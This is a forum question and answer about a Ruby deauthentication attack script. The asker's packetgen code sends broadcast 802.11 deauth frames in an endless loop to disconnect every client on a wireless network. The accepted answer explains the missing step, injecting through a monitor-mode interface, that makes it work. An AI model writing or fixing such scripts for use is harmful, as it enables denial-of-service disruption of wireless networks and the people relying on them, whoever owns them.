# Deauth frames showing up as ethernet II frames under wirshark

Tags: networking, wireless-networking, wireshark, ruby, 802.11

I'm trying to write a simple deauth attack script, but when I when fire up wireshark instead of deauth frames I only see Ethernet II frames; in addition the frames have no effect on any of my network's devices. Is it because I'm using wireshark in promiscuous mode, or is it a problem with my network configuration or my script. The code is below and the the screenshot is in a link to a similar question I asked on stack overflow [here](https://stackoverflow.com/q/52826348/9572280).

```
require 'packetgen'

 def deauth()
    network = 'wlp2s0'
    yes = 'y'
    no = 'n'
    broadcast = 'FF:FF:FF:FF:FF:FF'
    print 'Do you want to deauth network?[y/n]'
    input = gets.chomp
    if input == yes or yes.upcase!
        puts 'Deauthing all network clients...'
        while true
            PacketGen.gen('Dot11::Management', mac1: broadcast).
            add('Dot11::DeAuth').
            to_w(network)
            end
    elsif input == no or no.upcase!
        print 'Okay :('
        end
    end
deauth()
```

Answer (score 0, accepted):

Make sure you're injecting the packets into an interface that's in 802.11 monitor mode. Otherwise the interface will assume you're injecting 802.3 wired Ethernet packets and treat them as such.

Comment: If this ends up resolving your problem, please click the checkmark next to this answer to mark it as solved.